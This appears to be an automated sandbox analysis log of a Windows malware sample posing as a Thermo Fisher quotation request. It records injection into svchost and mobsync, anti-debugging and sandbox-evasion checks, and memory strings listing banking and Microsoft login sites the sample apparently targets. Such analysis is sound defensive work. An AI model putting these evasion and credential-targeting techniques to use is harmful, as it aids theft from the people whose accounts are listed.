                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0061E01E LoadLibraryA,GetProcAddress, 0_2_0061E01E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00626B05 push ecx; ret 0_2_00626B18
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00D493B0 push esi; ret 0_2_00D493B4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx 2_2_03B309B6
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_043027FA pushad ; ret 5_2_043027F9
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_0430225F pushad ; ret 5_2_043027F9
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_0430283D push eax; iretd 5_2_04302858
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_043309AD push ecx; mov dword ptr [esp], ecx 5_2_043309B6
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00158330 pushfd ; retf 5_2_0015833B
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00152414 push ecx; retf 5_2_0015244C
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00154C09 push esi; iretd 5_2_00154C0C
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00150CCA push esp; ret 5_2_00150CCB
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_0015ED60 push esi; retf 5_2_0015ED6B
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00160E12 push edx; iretd 5_2_00160E13
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00160FE1 push cs; ret 5_2_00160FE2
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_0014F03C push ebp; retf 5_2_0014F03D
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_001550FF push esi; retf 5_2_0015510A
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_00147A6B push ebp; iretd 5_2_00147A6D
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_0419469F push edi; ret 5_2_041946A2
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_041A0695 push ebx; ret 5_2_041A0696
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_041957E0 push esp; ret 5_2_041957E1
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_04197140 push ss; ret 5_2_04197143
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_041A5182 push eax; ret 5_2_041A5184
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00668111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00668111
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0061EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0061EB42
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0062123A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe API/Special instruction interceptor: Address: D4D24C
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2038347719.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2037922445.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000002.2063515481.0000000000CED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Evaded block: after key decision graph_0-93463
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-94275
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\mobsync.exe API coverage: 2.4 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2664 Thread sleep count: 46 > 30
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2664 Thread sleep time: -92000s >= -30000s
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe TID: 5296 Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe TID: 5296 Thread sleep time: -40500s >= -30000s
                Source: C:\Windows\SysWOW64\mobsync.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00646CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00646CA9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_006460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_006460DD
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_006463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_006463F9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0064EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0064EB60
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0064F56F FindFirstFileW,FindClose, 0_2_0064F56F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0064F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0064F5FA
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00651B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00651B2F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00651C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00651C8A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00651F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00651F94
                Source: C:\Windows\SysWOW64\mobsync.exe Code function: 5_2_0015C560 FindFirstFileW,FindNextFileW,FindClose, 5_2_0015C560
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0061DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0061DDC0
                Source: 10O4645j.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 10O4645j.5.dr Binary or memory string: discord.comVMware20,11696428655f
                Source: 10O4645j.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: global block list test formVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 10O4645j.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 10O4645j.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 10O4645j.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 10O4645j.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 10O4645j.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 10O4645j.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 10O4645j.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 10O4645j.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 10O4645j.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 10O4645j.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 10O4645j.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 10O4645j.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: firefox.exe, 00000007.00000002.2572487810.0000026BB8DDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj3AP
                Source: 10O4645j.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 10O4645j.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 10O4645j.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3903292682.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\mobsync.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417543 LdrLoadDll, 2_2_00417543
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00656AAF BlockInput, 0_2_00656AAF
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00603D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00603D19
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00633920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00633920
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_0061E01E LoadLibraryA,GetProcAddress, 0_2_0061E01E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00D4D4B8 mov eax, dword ptr fs:[00000030h] 0_2_00D4D4B8
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00D4D518 mov eax, dword ptr fs:[00000030h] 0_2_00D4D518
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe Code function: 0_2_00D4BE38 mov eax, dword ptr fs:[00000030h] 0_2_00D4BE38
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h] 2_2_03B663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03BEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03BB63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03B2C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h] 2_2_03B50310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h] 2_2_03BD437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h] 2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h] 2_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03BD8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
